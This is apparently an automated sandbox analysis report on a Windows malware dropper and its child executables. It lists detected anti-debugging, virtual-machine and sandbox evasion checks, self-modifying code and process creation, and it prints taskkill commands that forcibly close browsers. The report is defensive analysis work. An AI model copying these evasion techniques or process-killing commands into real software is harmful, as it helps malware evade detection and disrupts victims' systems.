Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0932 second address: 53B0936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0936 second address: 53B096D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940185h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F7A4E2C0A00h 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7A49940188h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B096D second address: 53B0973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C39775 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C37D8D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A7C1CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CC753C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1169775 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1167D8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FAC1CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11F753C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Special instruction interceptor: First address: 77CB35 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Special instruction interceptor: First address: 94DA4A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Special instruction interceptor: First address: 935E1C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Special instruction interceptor: First address: A7FB0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Special instruction interceptor: First address: C52B90 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Special instruction interceptor: First address: CAE5A8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Special instruction interceptor: First address: 77BF22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Special instruction interceptor: First address: 7E46F6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Special instruction interceptor: First address: 65DBF22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Special instruction interceptor: First address: 66446F6 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Memory allocated: 5400000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Memory allocated: 5650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Memory allocated: 5590000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053D0DAF rdtsc 0_2_053D0DAF
Contains functionality to detect virtual machines (SIDT)
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A4679 sidt fword ptr [esp-02h] 7_2_065A4679
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1861 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1804 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Window / User API: threadDelayed 9635
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5472 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5472 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2492 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2492 Thread sleep time: -78039s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5868 Thread sleep count: 326 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5868 Thread sleep time: -9780000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7536 Thread sleep count: 1861 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7536 Thread sleep time: -3723861s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1744 Thread sleep count: 1804 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1744 Thread sleep time: -3609804s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2944 Thread sleep count: 57 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2944 Thread sleep time: -114057s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1928 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 7648 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 7676 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 7752 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 7776 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 7664 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 7668 Thread sleep time: -52026s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 7672 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 7656 Thread sleep time: -46023s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 6024 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 2504 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 5956 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 2076 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 1984 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 1852 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 5680 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe TID: 2828 Thread sleep count: 119 > 30
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe TID: 2828 Thread sleep count: 136 > 30
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 3176 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 1716 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 504 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 1260 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 1464 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe TID: 5652 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe TID: 5164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe TID: 6644 Thread sleep count: 9635 > 30
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe TID: 6644 Thread sleep time: -96350s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe TID: 6644 Thread sleep count: 177 > 30
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe TID: 6644 Thread sleep count: 187 > 30
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe TID: 5240 Thread sleep count: 294 > 30
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe TID: 5240 Thread sleep count: 175 > 30
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Thread sleep count: Count: 9635 delay: -10
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Thread delayed: delay time: 922337203685477
Source: skotes.exe, skotes.exe, 00000002.00000002.1821553428.0000000001147000.00000040.00000001.01000000.00000008.sdmp, d015c0e328.exe, d015c0e328.exe, 00000007.00000002.2902629480.0000000000900000.00000040.00000001.01000000.0000000A.sdmp, d015c0e328.exe, 00000007.00000002.2928166711.0000000006599000.00000040.00000800.00020000.00000000.sdmp, 9b8665be8a.exe, 9b8665be8a.exe, 00000008.00000002.2534980003.0000000000C0F000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: d015c0e328.exe, d015c0e328.exe, 0000000A.00000003.2746676233.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2840231634.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2957610878.00000000004EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: d015c0e328.exe, 00000007.00000002.2905216851.0000000001141000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.000000000138E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1786470320.0000000000C17000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1816252916.0000000001147000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1821553428.0000000001147000.00000040.00000001.01000000.00000008.sdmp, d015c0e328.exe, 00000007.00000002.2902629480.0000000000900000.00000040.00000001.01000000.0000000A.sdmp, d015c0e328.exe, 00000007.00000002.2928166711.0000000006599000.00000040.00000800.00020000.00000000.sdmp, 9b8665be8a.exe, 00000008.00000002.2534980003.0000000000C0F000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: d015c0e328.exe, 00000007.00000002.2905216851.0000000001141000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2798934875.000000000113E000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2693329851.000000000113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW<(7
Source: d015c0e328.exe, 00000007.00000002.2905216851.0000000001141000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}List,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053D0DAF rdtsc 0_2_053D0DAF
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 9b8665be8a.exe PID: 7888, type: MEMORYSTR
Excessive usage of taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe "C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe "C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe "C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe "C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
